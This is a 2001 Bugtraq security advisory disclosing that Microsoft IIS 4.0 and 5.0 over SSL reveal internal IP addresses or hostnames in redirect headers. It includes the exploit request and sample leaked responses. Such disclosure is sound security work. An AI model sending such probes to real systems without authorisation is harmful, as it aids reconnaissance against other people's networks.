Bugtraq mailing list archives
Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
From: Marek Roy <marek_roy () hotmail com>
Date: 8 Aug 2001 04:54:55 -0000
GGS-AU / e-Synergies Security Advisory
August 8, 2001

Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0

Synopsis:
e-Synergies has discovered and researched a remote vulnerability in Internet Information Server from Microsoft. Successful exploitation of this vulnerability can reveal critical internal information such as Internal IP Address or Internal host name.

Affected Versions:
Microsoft IIS 4.0 running SSL
Microsoft IIS 5.0 running SSL

Description:
By connecting manually to port TCP/443 (SSL) using Perl(SSLeay) or any other tools, a remote user has the ability to retrieve Internal IP address or reveal the machine's network node hostname.

Exploit:
1- Browse the web site using a normal SSL browser and find any directory.
   I.E.: https://www.target.com/images/icon.gif

2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of www.target.com:

   GET /images HTTP/1.0

3- The result should look like this:

   HTTP/1.1 302 Object Moved
   Location: https://192.168.1.10/images/
   Server: Microsoft-IIS/4.0
   Content-Type: text/html
   Content-Length: xxx

   or

   HTTP/1.1 302 Object Moved
   Location: https://netbiosname/images/
   Server: Microsoft-IIS/4.0
   Content-Type: text/html
   Content-Length: xxx

Remarks:
Using HTTP/1.1 instead of HTTP/1.0 will not give the same result.

Credits:
Marek Roy
Senior IT Security Consultant

Please send suggestions, updates, and comments to:

GGS-AU / e-synergies, Sydney, Australia
Level 9
65 York Street
Sydney NSW 2001
Australia
Phone: +61 2 9279 2533
Fax: +61 2 9279 2544
Email: enquiries () ggs-au com
http://www.ggs-au.com